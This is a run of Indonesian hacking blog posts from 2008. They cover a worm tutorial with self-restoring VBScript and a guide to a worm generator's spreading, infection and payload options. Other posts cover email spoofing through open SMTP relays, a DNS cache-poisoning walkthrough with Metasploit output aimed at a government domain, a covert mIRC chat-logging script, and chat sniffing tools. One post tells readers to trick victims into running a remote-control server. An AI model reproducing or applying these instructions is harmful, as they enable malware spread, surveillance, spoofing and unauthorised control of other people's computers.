Untuk tool nya, bisa Anda sedot di http://www.download3k.com/Install-IMMonitor-Yahoo-Messenger-Spy.html
namun, yang anda dapatkan adalah versi trial, anda bisa memasukkan kode 4BE6183BB5841628 supaya tidak menunggu counter.

Selanjutnya, bagaimana cara kita menghindari aksi sniffing tersebut?

Selain dengan cara merubah type MAC Address dari dynamic ke static, anda juga bisa mempersiapkan form login yang biasa anda gunakan dari local drive atau gunakan web yang menyediakan form login. Misalnya pada http://xpemula terdapat form login untuk yahoomail, itu bisa anda gunakan.

karena pada beberapa kasus cain akan membaca alamat xpemula walaupun sebenarnya kita sudah berada di dalam yahoomail

Selain itu, cain biasanya hanya mampu menangkap 10 karakter dari password, jadi buatlah password minimal lebih dari 10 karakter.

Semoga tulisan ini bisa lebih memperjelas tentang cara penggunaan cain

Steganograph

noreply@blogger.com (BlackSignal) — Fri, 21 Nov 2008 03:13:00 +0000

Selama ini, cara yang digunakan untuk melindungi data rahasia ada dua macam, yaitu Kriptography dan Steganography. Namun yang umun digunakan adalah kriptography yaitu dengan cara mengacak, contohnya file sam pada windows yang menyimpan account user.
Pada tulisan ini saya tidak akan membahas tentang kriptography, melainkan akan membahas cara yang kedua yaitu steganography. Steganography merupakan salah satu cara melindungi sebuah data dengan cara disembunyikan dibalik file lain, misalnya gambar. Sebenarnya ada beberapa tool yang bisa digunakan untuk melakukan pekerjaan ini, tapi kali ini saya tidak akan menyertakan tool. Perlu diketahui, apabila kita mengencode sebuah data dengan tool steganography maka untuk mengekstak nya harus menggunakan tool yang sama.
Seperti yang saya katakan tadi, saya tidak akan menggunakan tool tapi akan memanfaatkan sebuah web. Silahkan buka http://utilitymill.com/utility/steganography_encode. Tampilannya seperti ini
sistem ini hanya support terhadap file gambar dengan ekstensi .bmp dan .png
Sekarang akan kita coba untuk mengencode sebuah data, untuk itu siapkan sebuah file bmp atau png.
1. Klik Browse untuk mengambil file yang akan di encode, dalam hal ini saya mengguakan file berkestensi bmp

klik open
2. Masukkan data yang akan di sembunyikan, sebagai contoh saya memasukkan kalimat "pin untuk save deposite bank adalah abcd678ex" tanpa tanda kutif.

3. Pilih ekstensi file yang digunakan
4. Klik Go
Setelah semua langkah tadi selesai dilakukan tunggulah beberapa saat kemudian muncul

simpanlah file yang baru.

Lantas bagaimana cara mengekstraknya?
Untuk mengekstraknya, klik http://www.utility.com/utility/steganography-decode

kemudian klik Browse dan pilih file yang membawa data tadi terakhir klik Go
hasilnya seperti di bawah ini

BUDIDAYA CACING

noreply@blogger.com (BlackSignal) — Tue, 18 Nov 2008 04:28:00 +0000

Bagi anda yang akrab dengan computer apalagi internet, tentu anda sering mendengar nama WORM. Malicious code ini bersifat parasit walaupun worm tidak membutuhkan tempat khusus. Inilah salah satu hal yang membedakan antara worm dengan virus, walaupun masih ada beberapa karakter yang membedakan keduanya.

Beberapa kemampuan yang dimiliki oleh worm:
- mampu menduplikasikan diri
- mampu mendistribusikan diri terutama lewat email
- mampu menyembunyikan diri
- mampu mengeruk informasi dari induk yang ditinggali

mungkin anda berpendapat, untuk membuat worm dengan kemampuan seperti itu harus mempunyai kemampuan pemahaman permrograman tingkat tinggi. Sebenarnya untuk membuat sebuah worm, ada tool yang bisa digunakan, salah satunya Vbs WG (Worm Generator), walaupun demikian kemampuan anda dalam memahami bahasa pemrograan tetap dibutuhkan utnuk lebih mendongkrak kemampuan worm yang akan anda buat.

Misalnya seperti ini:

on error resume next
set black=CreateObject(“Scripting.FileSystemObject)
set kabeh=black.OpenTextFile(Wscript.scriptFullName)
kopian=kabeh.ReadAll
kabeh.close

do

wscript.sleep 100

if black.FileExists(Wscript.ScriptFullName)=false then
set balikin=black.CreateTextFile(Wscript.ScriptFullName)
balikin.write kopian
balikin.close
end if
loop

script diatas berfungsi untuk mengembalikan file saat worm dihapus dan akan terus seperti itu.

if black.FileExists(Wscript.ScriptFullName)=false then
set balikin=black.CreateTextFile(Wscript.ScriptFullName)

script diatas merupakan perintah untuk mencari file worm dan apabila file yang dimaksud tidak ditemukan maka akan dibuat sebuah file dengan nama yang sama.

Loop

Berarti perulangan

Yang jadi masalah, tidak semua orang mengerti bahasa pemrograman seperti itu. Untuk itulah kali ini saya ingin menulis tentang sebuah tool worm generator yang akan menunjukkan bagaimana membuat worm dengan mudah. Walaupun tool ini tidak bias dijadikan sebagai tumpuan, karena untuk membuat sebuah worm yang powerfull tetap dibutuhkan pengetahuan pemrograman.
Ada beberapa hal yang saya rasa sangat penting untuk menjadi seorang worm maker ataupun programmer:

- pengetahuan dan pemahaman bahasa pemrograman
- daya hayal
- logika

Kita kembali ke masalah tool tadi. Seperti yang telah disinggung diatas, salah satu worm generator yaitu VBS WG, dan itulah yang akan kita bahas sekarang ini.

saya akan menjelaskan tentang fitur-fitur yang dimiliki oleh VbsWG, jadi dengan mengetahui fitur-fitur itu saya harap anda sudah dapat membuat sebuah worm.

Screenshoot nya seperti ini

- Worm name: Nama Worm
- Your name: Nama pembuat worm
- File name: tempat untuk memasukkan nama file yang digunakan untuk mengcopy dirinya menuju tempat yang aman. Anda dipersilahkan utnuk memilih ekstensi file tapi selalu diakhiri dengan .vbs
- Copy wom to: untuk memilih folder tempat menyimpan worm. Folder akan berubah otomatis tergantung lokasi yang dipilih.

TAB STARTUP

Start with windows: dengan pilihan ini maka worm akan aktif saat windows dijalankan.
- Registry name: nama untuk membedakan worm dengan nilai startup dalam system.

TAB EMAIL

Merupakan halaman penyebaran worm melalui email, ada opsi pengiriman dalam bentuk attachment atau html dan dapat menyebar kesetiap nama yang ada dalam address book.

- Subject: bisa diibaratkan judul pesan. Disarankan buat subject semenarik mungkin supaya orang tertarik untuk membuka nya.
- Message body: masukkan isi, gunakanlah social engineering.

TAB IRC

- Infect Mirc: untuk mencari file mirc.ini biasanya terdapat di C:\Program Files\mirc
- Search mirc.ini: mencari file mirc.ini di seluruh harddisk

TAB INFECT

Untuk memilih file yang akan diinfeksi

TAB PAYLOAD

Dalam pilihan ini terdapat beberapa fitur tambahan dalam pembuatan worm. Untuk dapat mengaktifkan pilihan ini maka beri tanda pada pilihan Use Payload.

· Show message adalah message box pada computer user. Selanjutnya anda bias menambahkanisi pesan, judul, dan gambar.

· Go to url untuk membuat navigator default yang menuju ke sebuah situs.

· Change registered owner name berguna untuk mengubah nama value di registry windows, yaitu pada

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner

· Shutdown berfungsi untuk melakukan shutdown computer. Fitur ini tidak dapat bekerja pada Windows 2000 dan Windows NT. Namun pada beberapa versi NT silahkan coba dulu!

· When memiliki dua opsi yaitu Random dan Date.
Random worm akan bekerja secara acak tergantung dan seberapa sering payload akan diaktifkan. Secara default tertulis 1 in 50, artinya akan dilakukan 50 kali eksekusi dimana payload akan di tringer sekali saja. Sedangkan Date, maka waktu eksekusi dapat ditentukan sesuai keinginan.

TAB EXTRAS

Pada tab extras jika diklik akan muncul beberapa menu:

· Antideletion

Berfungsi untuk membuat worm sulit dihapus, jika worm pernah dihapus maka akan dibuat lagi worm dengan nama yang sama dan Anti Registry Deletion berfungsi untuk memeriksa jika value dalam registry pernah dihapus maka akan dibuat kembali.

· Join Exe

Dengan join exe maka worm yang dibuat akan menyertai file exe yang berupa program didalamnya dan melakukan eksekusi program tersebut. Kelemahannya, ukuran worm akan menjadi lebih besar dari semestinya.

Exe Path

Berfungsi untuk mencari file yang akan ditambahkan kedalam worm, usahakan kurang dari 350 kb sebab size worm bisa menjadi sangat besar.

Setelah mengetahui fitur-fitur dari VbsWG ini, maka anda sudah bisa membuat sebuah worm. Tapi ada satu hal yang perlu diingat, kadang kala saat worm sudah selesai di buat dan di generat, tapi malah terjadi error. Untuk menanggulangi hal ini, langkah yang perlu diambil ialah, pada saat pembuatan worm, pilihlah opsi View worm source after creating.

lalu pada baris kedua tambahkan kalimat on error resume next ini berlaku untuk semua kasus error

Yang perlu diingat saat anda akan membuat worm, usahakan pada system terinstall freezer agar anda bisa mengembalikan keadaan computer seperti sedia kala setelah di restart dan matikan antivirus, karena antivirus akan menangkap file worm yang telah anda buat.

Mengirim Email Kaleng

noreply@blogger.com (BlackSignal) — Tue, 02 Sep 2008 15:10:00 +0000

Kejadian ini terjadi beberapa waktu yang lalu ketika saya bermaksud memberitahukan kepada seorang teman bahwa ID dan Paaword nya telah berhasil disadap ketika ia berselancar di sebuah warnet. Karena saya punya pengalaman buruk dimana saat memberitahukan hal semacam ini kepada yang bersangkutan justru saya yang dituduh, maka saya putuskan untuk memberitahunya melalui email kaleng (tanpa pengirim yang jelas). Inilah yang akan kita bahas pada tulisan kali ini.
Pada dasarnya, yang saya gunakan disini adalah memanfaatkan server yang membuka port 25 dengan telnet. Telnet sendiri merupakan protokol yang menggunakan protokol TCP/IP dan digunakan untuk melakukan koneksi dengan remote komputer.

Untuk mencari server yang membuka port 25, silahkan gunakan tool scaner yang anda sukai.
Kita asumsikan Anda telah mendapatkan target, kemudian lakukan langkah berikut:

1. Pada Command Prompt ketikkan: telnet target 25 kemudian enter. Perhatikan gambar dibawah ini, disini saya menggunakan 202.169.224.5, jadi perintahnya menjadi telnet 202.169.224.5 25.

2. Setelah anda masuk ke server

ketikkan HELO [nama.server.smtp] enter

3. Masukkan alamat pengirim dengan format MAIL FROM: alamat@pengirim [enter]. Misalnya MAIL FROM: black_signal@xpemula.tk

4. Setelah mucul tulisan '250 ok' masukkan alamat pengirim dengan format RCPT TO: alamat@pengirim [enter]. Sebagai contoh email i9ni saya tujukan ke alamat email saya yang beralamat di cord_weapon@yahoo.it, jadi perintah lengkapnya menjadi RCPT TO: cord_erapon@yahoo.it

5. Tulisan '250 ok' akan kembali muncul. Ketikkan DATA diikuti enter

6. Kali ini tulisan yang keluar '354 go ahead', setelah itu ketikkan isi pesannya. Misalnya seperti ini..

FROM: black_signal@xpemula.tk
CC:
Subject: Mengirim Email Kaleng
Date: Tue, 02 September 2008

Saya mencoba untuk mengirim email dengan alamat semau saya, hal ini saya lakukan agar si penerima tidak mengetahui dari siapa email ersebut datang. Deangan demikian identitas saya sebagai pengirim tidak akan diketahui penerima.

Terima kasih
.

Perhatikan tanda '.' (titik) paling bawah. Tanda titikk merupakan akhir dari statment yang menandakan penulisan email telah selesai dan email harus segera dikirim. Setelah titik diikuti enter 2 kali.

Untuk mengecek kebenarannya, mari kita buka email tujuan tadi.

Tips: Apabila anda salah dalam mengetikkan perintah, anda harus mengulang dari awal sebab sistem akan membaca string gabungan yang lama dan yang baru anda ketikkan.

Tambahan: Cara pengiriman email diatas sering digunakan oleh para pencuri data untuk mengelabui nasabah bank dengan mengirim email atas nama bank yang bersangkutan.

BUG DNS

noreply@blogger.com (BlackSignal) — Wed, 20 Aug 2008 07:00:00 +0000

Issue ke-19 echo

Bugs DNS yang ditemukan oleh Dan Kaminsky merupakan bugs DNS paling parah sepanjang sejarah internet, beberapa pihak bahkan menyebutkan bugs DNS ini merupakan bugs paling parah diantara seluruh jenis bugs yang pernah ditemukan. Rasanya memang tidak salah jika Dan merencanakan metode patch yang baru pertama kali dilakukan oleh dunia sejak internet ditemukan dimana rilis patch dilakukan secara bersamaan dengan dukungan lebih dari 80 vendor DNS.

Jenis hole yang ditemukan oleh Dan Kaminsky merupakan perpaduan antara old attack #1 dan old attack #2. Hole tersebut memanfaatkan kelemahan QID yang hanya 16 bit disertai penggunaan protokol UDP sehingga dapat di bruteforce menggunakan paket flooding, dan memanfaatkan kelemahan pada "bailiwick checking". Bentuk response dari hole Dan kaminsky sebagai berikut:


;; QUESTION SECTION:
;notexist.depkominfo.go.id.  IN A

;; ANSWER SECTION:
notexist.depkominfo.go.id. 120 IN A 41.41.41.41

;; AUTHORITY SECTION:
depkominfo.go.id.  86400 IN NS www.depkominfo.go.id.

;; ADDITIONAL SECTION:
www.depkominfo.go.id.  604800 IN A 41.41.41.42

Penyerang berusaha untuk membuat resolver melakukan query terhadap notexist.depkominfo.go.id, dan kemudian juga sekaligus mengirimkan response untuk notexist.depkominfo.go.id pada bagian answer, menyediakan informasi authority nameserver domain tersebut pada bagian authority section, dan...memberikan alamat IP nameserver domain tersebut pada bagian additional section. Harap diingat bahwa penyerang juga harus menyesuaikan QID response yang dikirimkan agar data tipuan tersebut dimasukan pada cache dns target. Jika berhasil, maka cache dns server akan teracuni informasi palsu dan mengarahkan semua request depkominfo.go.id menuju nameserver yang telah dipersiapkan oleh penyerang.

Hole ini berhasil mematahkan proses in-bailiwick checking resolver. Nameserver/resolver yang dijadikan target serangan akan percaya sepenuhnya pada response tersebut karena www.depkominfo.go.id memang berada didalam bailiwick checking (*.depkominfo.go.id).


That's it?! so simple, isn't it? :).


======= Teknik Eksploitasi ---|

Dengan adanya public disclosure mengenai hole ini, maka exploit beserta aksi kejahatan lainnya merebak dalam waktu kurang dari 24 jam. Pada bagian akhir kita akan membahas kemungkinan jenis kejahatan yang dapat dilakukan dengan memanfaatkan hole ini. Teknik eksploitasi ada berbagai macam, selain logic serangan yang akan mempengaruhi hasilnya, bahasa pemrograman yang digunakan juga ikut berperan serta. Berdasarkan keterangan Dan kaminsky, awalnya digunakan python sebagai eksploit namun karena terlalu lamban maka diganti menggunakan C. C diklaim dapat melakukan dns cache poisoning suatu resolver dalam watu kurang dari 1 menit (kecepatan internet juga mempengaruhi). Berikut ini permasalahan yang dihadapi untuk membuat eksploit hole diatas:


1. QID/TXID

Inti dari hole Kaminsky adalah pada bailiwick checking, namun kita tetap berhadapan dengan masalah QID DNS. Untuk implementasi DNS server saat ini dimana QID merupakan data 16 bit maka dibutuhkan mekanisme agar dapat lebih dahulu memberikan response dengan QID yang tepat kepada resolver. Bentuk eksploit saat ini menggunakan trik non-exist domain, misal: aaaa.google.com, aaab.google.com, dst. Sehingga apabila paket response dari nameserver asli datang lebih dulu maka jawabannya adalah NXDOMAIN (non-exist domain), sedangkan jika pake response hasil spoofing kita sampai lebih dulu maka jawabannya adalah alamat nameserver (A). Tehnik bruteforce QID ada berbagai macam dan dapat digunakan untuk meloloskan paket bruteforce response kita.


2. UDP Protocol

Hal ini berkaitan dengan konfigurasi dan implementasi nameserver itu sendiri. Beberapa nameserver menggunakan random source port saat melakukan dns query, sehingga jika kita ingin melakukan spoofing paket response bukan hanya harus menebak QID yang digunakan server tersbut saat mengirimkan query namun juga harus menebak source udp port yang digunakan. Hal ini menambah kompleksitas bruteforce menjadi 2^16 x 2^16 (16 bit QID x 16 bit source udp port).


3. Speed

Kecepatan koneksi juga ikut mempengaruhi proses bruteforce, hal ini adalah masalah klasik. Jika kita menggunakan koneksi dial-up (telkomnet????) untuk menyerang nameserver suatu ISP mungkin akan sia-sia, karena koneksi antara DNS server ISP dengan DNS server domain yang asli lebih cepat dibandingkan koneksi kita dengan DNS ISP maka paket response dari DNS server domain asli akan sampai lebih dulu. Hal ini mungkin akan berbeda jika kita bisa memiliki koneksi yang sangat cepat. Teknik paling mudah adalah menyerang DNS lokal (warnet, sekolah, kantor, dll) karena koneksi antara komputer yang kita gunakan untuk menyerang umumnya lebih cepat dibandingkan koneksi antara DNS server lokal tersebut dengan DNS server domain asli.


4. Recursive

Beberapa konfigurasi DNS server tidak mengijinkan dilakukan recursive query, atau membatasi recursive query hanya pada network tertentu sehingga akses melakukan eksploitasi terbatas hanya pada lokal area network tempat DNS server tersebut berada.



=======  Exploit in Action ---|

Untuk contoh penggunaan eksploit dan efeknya penulis menggunakan metasploit framework. Dalam real attack penggunaan metasploit framework jelas kurang efisien karena masih terlalu lama untuk dapat sukses melakukan injeksi, terlebih lagi jika kita menggunakan koneksi yang lamban (somehow, masalah ini bisa diatasi, mis: dengan melakukan serangan via salah satu mesin korban lain yang telah di own dan memiliki bandwidth tinggi ;) ), namun prinsip kerja metasploit (terutama kalkulasi jumlah spoofing paket per query dan response) cukup lengkap untuk dijadikan sebagai referensi.




msf auxiliary(bailiwicked_domain) > show options

Module options:

Name     Current Setting   Required  Description
----     ---------------   --------  -----------
DOMAIN   depkominfo.go.id  yes       The domain to hijack
NEWDNS   192.168.2.105     yes       The hostname of the replacement DNS server
RECONS   208.67.222.222    yes       The nameserver used for reconnaissance
RHOST    192.168.2.102     yes       The target address
SRCADDR  Real              yes       The source address to use for sending the queries (accepted: Real, Random)
SRCPORT  53                yes       The target server's source query port (0 for automatic)
TTL      44910             yes       The TTL for the malicious host entry
XIDS     0                 yes       The number of XIDs to try for each query (0 for automatic)

msf auxiliary(bailiwicked_domain) > exploit
[*] Targeting nameserver 192.168.2.102 for injection of depkominfo.go.id. nameservers as 192.168.2.105
[*] Querying recon nameserver for depkominfo.go.id.'s nameservers...
[*]  Got an NS record: depkominfo.go.id.       3496    IN      NS      ns.depkominfo.go.id.
[*]   Querying recon nameserver for address of ns.depkominfo.go.id....
[*]    Got an A record: ns.depkominfo.go.id.    3496    IN      A       222.124.199.71
[*]     Checking Authoritativeness: Querying 222.124.199.71 for depkominfo.go.id....
[*]     ns.depkominfo.go.id. is authoritative for depkominfo.go.id., adding to list of nameservers to spoof as
[*]  Got an NS record: depkominfo.go.id.       3496    IN      NS      ns1.depkominfo.go.id.
[*]   Querying recon nameserver for address of ns1.depkominfo.go.id....
[*] Calculating the number of spoofed replies to send per query...
[*]   race calc: 100 queries | min/max/avg time: 1.11/188.08/3.72 | min/max/avg replies: 368/65438/1313
[*] Sending 1969 spoofed replies from each nameserver (1) for each query
[*] Attempting to inject poison records for depkominfo.go.id.'s nameservers into 192.168.2.102:53...
[*] Poisoning successful after 250 queries and 492250 responses: depkominfo.go.id. == 192.168.2.105
[*] Auxiliary module execution completed


Jasmine:~ Cyberheb$ dig -t NS @192.168.2.102 depkominfo.go.id

; <<>> DiG 9.4.1-P1 <<>> -t NS @192.168.2.102 depkominfo.go.id
; (1 server found)
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 49356 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0  ;; QUESTION SECTION: ;depkominfo.go.id.  IN NS  ;; ANSWER SECTION: depkominfo.go.id. 41164 IN NS 192.168.2.105.  ;; Query time: 37 msec ;; SERVER: 192.168.2.102#53 (192.168.2.102) ;; WHEN: Sun Aug  3 18:49:22 2008 ;; MSG SIZE  rcvd: 61

Pada demo diatas, kita melakukan cache poisoning terhadap DNS server 192.168.2.102 untuk domain depkominfo.go.id, hasil akhirnya seluruh query domain depkominfo.go.id akan diarahkan pada DNS server 192.168.2.105. Seluruh client yang menunjuk 192.168.2.102 juga akan mendapatkan hasil yang sama. Metasploit menggunakan opendns untuk proses RECONS authoritative DNS server domain depkominfo.go.id, hal ini dilakukan untuk mencegah data tersebut masuk cache DNS server target jika dilakukan query secara langsung (asumsi kita belum tau nameserver untuk domain depkominfo.go.id). FYI, kita tidak hanya dapat menggunakan opendns, namun juga bisa menggunakan open DNS server yang lain. Phoenix dari k-elektronik pernah membuat tools untuk mencari open DNS server ini pada internet. Setelah mendapatkan informasi authoritative nameserver, metasploit akan menghitung berapa jumlah response terhadap setiap query yang dikirimkan, dengan ini diharapkan proses bruteforce QID akan lebih efisien. Berikut ini hasil capture paket-paket data yang sampai di DNS target, dan akan memperlihatkan implementasi dari 'asumsi' yang dilontarkan oleh halvar flake saat membuka rahasia hole DNS Dan Kaminsky: Internet Protocol, Src: 192.168.2.105 (192.168.2.105), Dst: 192.168.2.102 (192.168.2.102) User Datagram Protocol, Src Port: 47498 (47498), Dst Port: domain (53) Domain Name System (query) [Response In: 276016] Transaction ID: 0xffd4 Flags: 0x0100 (Standard query) 0... .... .... .... = Response: Message is a query .000 0... .... .... = Opcode: Standard query (0) .... ..0. .... .... = Truncated: Message is not truncated .... ...1 .... .... = Recursion desired: Do query recursively .... .... .0.. .... = Z: reserved (0) .... .... ...0 .... = Non-authenticated data OK: Non-authenticated data is unacceptable Questions: 1 Answer RRs: 0 Authority RRs: 0 Additional RRs: 0 Queries VmlcscEEItDB9.depkominfo.go.id: type A, class IN Name: VmlcscEEItDB9.depkominfo.go.id Type: A (Host address) Class: IN (0x0001) Internet Protocol, Src: 192.168.2.102 (192.168.2.102), Dst: 222.124.199.71 (222.124.199.71) User Datagram Protocol, Src Port: domain (53), Dst Port: domain (53) Domain Name System (query) [Response In: 276013] Transaction ID: 0x2e16 Flags: 0x0010 (Standard query) 0... .... .... .... = Response: Message is a query .000 0... .... .... = Opcode: Standard query (0) .... ..0. .... .... = Truncated: Message is not truncated .... ...0 .... .... = Recursion desired: Don't do query recursively .... .... .0.. .... = Z: reserved (0) .... .... ...1 .... = Non-authenticated data OK: Non-authenticated data is acceptable Questions: 1 Answer RRs: 0 Authority RRs: 0 Additional RRs: 1 Queries VmlcscEEItDB9.depkominfo.go.id: type A, class IN Name: VmlcscEEItDB9.depkominfo.go.id Type: A (Host address) Class: IN (0x0001) Additional records : type OPT

Name:

          Type: OPT (EDNS0 option)
        UDP payload size: 4096
        Higher bits in extended RCODE: 0x0
        EDNS0 version: 0
        Z: 0x8000
            Bit 0 (DO bit): 1 (Accepts DNSSEC security RRs)
            Bits 1-15: 0x0 (reserved)
        Data length: 0

Internet Protocol, Src: 222.124.199.71 (222.124.199.71), Dst: 192.168.2.102 (192.168.2.102)
User Datagram Protocol, Src Port: domain (53), Dst Port: domain (53)
Domain Name System (response)
Transaction ID: 0x7eed
Flags: 0x8500 (Standard query response, No error)
    1... .... .... .... = Response: Message is a response
    .000 0... .... .... = Opcode: Standard query (0)
    .... .1.. .... .... = Authoritative: Server is an authority for domain
    .... ..0. .... .... = Truncated: Message is not truncated
    .... ...1 .... .... = Recursion desired: Do query recursively
    .... .... 0... .... = Recursion available: Server can't do recursive queries
    .... .... .0.. .... = Z: reserved (0)
    .... .... ..0. .... = Answer authenticated: Answer/authority portion was not authenticated by the server
    .... .... .... 0000 = Reply code: No error (0)
Questions: 1
Answer RRs: 1
Authority RRs: 1
Additional RRs: 1
Queries
    VmlcscEEItDB9.depkominfo.go.id: type A, class IN
        Name: VmlcscEEItDB9.depkominfo.go.id
        Type: A (Host address)
        Class: IN (0x0001)
Answers
    VmlcscEEItDB9.depkominfo.go.id: type A, class IN, addr 135.177.94.73
        Name: VmlcscEEItDB9.depkominfo.go.id
        Type: A (Host address)
        Class: IN (0x0001)
        Time to live: 12 hours, 28 minutes, 30 seconds
        Data length: 4
        Addr: 135.177.94.73
Authoritative nameservers
    depkominfo.go.id: type NS, class IN, ns 192.168.2.105
        Name: depkominfo.go.id
        Type: NS (Authoritative name server)
        Class: IN (0x0001)
        Time to live: 12 hours, 28 minutes, 30 seconds
        Data length: 15
        Name server: 192.168.2.105
Additional records
    192.168.2.105: type A, class IN, addr 135.177.94.73
        Name: 192.168.2.105
        Type: A (Host address)
        Class: IN (0x0001)
        Time to live: 12 hours, 28 minutes, 30 seconds
        Data length: 4
        Addr: 135.177.94.73

Dari struktur diatas, kita dapat melihat attacker (192.168.2.105) mengirim query untuk VmlcscEEItDB9.depkominfo.go.id, kemudian resolver/dns server yang dijadikan target (192.168.2.102) akan melakukan recursive dns query untuk mencari authoritative dns server domain depkominfo.go.id serta menanyakan jawaban untuk server VmlcscEEItDB9.depkominfo.go.id, saat resolver tersebut mencari jawaban dari authoritative dns server attacker mengirimkan flooding response untuk pertanyaan tersebut. Dan jika QID response-nya sama dengan QID query resolver maka cache resolver akan teracuni, dan dengan metasploit hal ini
paling tidak membutuhkan sekitar 3 menit. Konidisi race inilah yang menentukan apakah proses poisoning berhasil, jika response dari authoritative dns server domain depkominfo.go.id lebih dulu datang maka response berisi NXDOMAIN (non-existant domain) akan diberikan kepada resolver, dan resolver akan meneruskan kepada attacker. Seluruh flood yang tersisa untuk query tersebut akan di-discard oleh resolver.


Selengkapnya baca di http://www.ezine.echo.or.id/ezine19/e19.008.txt

Ngisengin Orang

noreply@blogger.com (BlackSignal) — Mon, 11 Aug 2008 06:14:00 +0000

Kenapa Saya memberi judul pada tulisan kali ini”Ngisengin Orang”? Karena kali pertama saya menggunakan ini hanya untuk iseng pada sebuah room di sebuah warnet.

Kali ini saya ingin menyentuh tentang sebuah bahasa pemrograman yaitu VBS untuk mengirimkan pesan pada komputer lain yang berada dalam satu jaringan. Pada prinsipnya disini menggunakan Net Send, bedanya ada sedikit modifikasi dengan menggunakan VBScript.

Berikut adalah script nya:

Option Explicit

Const MyApp = "Send Network Message, By: BlackSignal"

Const Netsend = "%COMSPEC% /C %SystemRoot%\system32\NET.EXE SEND"

Const WindowStyle = 0

Const WaitOnReturn = False

Dim sCommand, sSendto, sMessage

Dim oSh

On Error Resume Next

If Not IsWinnt() Then

Wscript.Echo "Script ini hanya berlaku untuk windows berbasis NT"

Wscript.Quit(1)

End If

sSendto = InputBox("Masukkan nama komputer target atau IP Address atau gunakan karakter * untuk pengiriman massal", MyApp)

If sSendto = "" Then Wscript.Quit(1)

sCommand = Netsend & " " & sSendto

sMessage = InputBox("Ketikkan pesan Anda:", MyApp)

If sMessage = "" Then Wscript.Quit(1)

sCommand = sCommand & " " & sMessage

Set oSh = CreateObject("Wscript.Shell")

oSh.Run sCommand, WindowStyle, WaitOnReturn

Set oSh = Nothing

Private Function IsWinnt()

Const OSNT = "Windows_NT"

Dim oSh

Dim sOS

IsWinnt = False

Set oSh=CreateObject("Wscript.Shell")

sOS = oSh.ExpandEnvironmentStrings("%OS%")

Set oSh = Nothing

If sOS = OSNT Then IsWinnt = True

End Function

Script tersebut disimpan dalam ekstensi .vbs
Cara kerja dari script ini adalah mengirimkan pesan ke komputer target dengan memasukkan alamat IP Address target atau dengan memasukkan karakter * untuk pengiriman massal.

Tampilannya seperti gambar dibawah ini.

Thanks to:

Okki Navarone

Efvy Zamidra Zam

Lirva32

Bermain-main dengan Yahoo Messenger

noreply@blogger.com (BlackSignal) — Tue, 22 Apr 2008 05:32:00 +0000

Seorang hacker biasanya cenderung memilih client yang ada di channel IRC sebagai korbannya, hal ini karena IRC lebih tidak teratur dan biasanya tidak dimoderasi. Keadaan ini akan lebih memudahkan hacker untuk menyerang korbannya.

Seorang hacker bisa memonitor apa yang ditulis oleh korbannya dan dengan siapa saja dia melakukan komunikasi di IRC. Untuk melakukan hal itu, hacker hanya perlu menyusupkan script ke system korban.

on 1:INPUT:*:{msg [#nama channel] $active $+ : $1- write c:\windoes\system\[nama file] <$+ $nick $+ $ip $+> $active $+ : 1-}

Fungsi script diatas adalah untuk mengirimkan pesan ke channel yang sudah ditentukan. Script ini pernah hits di awal tahun 2003an.

Namun sekarang IRC sudah banyak ditinggalkan orang dan lebih memilih Instan messeging seperti Yahoo messenger dan sejenisnya yang dianggap lebih langsung, friendsly dan aman. Hal itu ditunjukkan oleh Yahoo Messenger yang apabila akan masuk ke salah satu channel, kita harus melalui sebuah filter berupa captcha.
Namun demikian, YM sebenarnya masih tetap bisa dimonitor walaupun untuk melakukan hal ini, kita membutuhkan tool dari pihak ketiga. Saya Sendiri biasa menggunakan YahooChecker.

Untuk mendapatkan tool nya, silahkan sedot di:
http://rapidshare.com/files/109330688/yahoochecker.exe

Kita asumsikan anda telah mendownload dan menginstal yahoockecker.exe. kemudian jalankan programnya. Screenshoot nya seperti gambar di bawah ini.

Setelah itu kita lakukan konfigurasi.

1. Tentukan Adapter

2. Scanning terhadap ip address jaringan lokal

Pilih salah satu IP yang akan kita monitor

3. Klik START untuk memulai monitoring

Jika room yang kita monitor ternyata sedang online dan melakukan komunikasi di YM, hasilnya akan tampak seperti gambar dibawah ini.

Ingat,,,ngintip merupakan pekerjaan yang kurang baik...bisa berakibat timbilan..!!

Mengontrol PC Orang Lain

noreply@blogger.com (BlackSignal) — Sun, 13 Apr 2008 22:09:00 +0000

Apa yang akan kita bicarakan kali ini sebenarnya sudah menjadi hal yang umum bagi admin jaringan, tapi yang namanya belajar tentunya tidak mengenal hal itu. Yang akan kita bahas ialah bagaimana mengontrol komputer lain secara remote. Disini kita menggunakan COOL! Remote Control, alasan saya memilihnya karena COOL! sangat mudah dioperasikan. Selain itu, bagi para peternak keylogger mungkin ini bisa menjadi salah satu alternatif mengingat memasyarakatnya pengguna freezer yang membuat keylogger tidak bisa berbuat banyak.

Tool nya silahkan sedot di http://rapidshare.com/files/107271807/remote.zip

Download dan install lah! Kemudian buka direktori C:\Program Files\COOL! Remote Control, disana ada dua buah file aplikasi yaitu RemoteControl dan Remote Server.

File pertama yaitu RemoteControl merupakan aplikasi controler untuk komputer kita sedangkan file yang kedua adalah file connector antara komputer kita dengan korban. File inilah yang harus dikirim kemudian di jalankan di komputer korban. Silahkan anda pikirkan bagaimana caranya agar file RemoteServer ini bisa dijalankan, apakah mau di bungkus oleh file lain (digabungkan) kemudian dikirim ke korban atau gunakan social engineering...teu langkung!

Jalankan program Cool! Screenshootnya seperti ini.

Hal pertama yang harus kita lakukan ialah menghubungkan antara komputer kita dengan komputer korban. Kita asumsikan bahwa kita telah menyimpan dan menjalankan file server di komputer korban. Untuk itu, klik menu Main-Connect To atau gunakan Ctrl+C

Isi Ip Address dari komputer korban kemudian klik OK.

Setelah koneksi berhasil, Anda bisa berbuat banyak pada komputer korban termasuk menjawab pesan di chatting.

Namun ada satu kelemahan dari cool ini yaitu pada saat file server di jalankan dia akan menambahkan satu icon. Perhatikan gambar berikut!

Tapi diluar itu, tool ini layak untuk dijadikan salah satu senjata.

Anonymous

noreply@blogger.com (BlackSignal) — Thu, 20 Mar 2008 16:32:00 +0000

Bukan hanya kalangan Hacker atau Carder yang menginginkan kerahasiaan identitasnya tetap terjaga saat ia connect ke internet, tapi kadangkala individu yang bukan dari kelompok keduanyapun menginginkan hal yang sama.

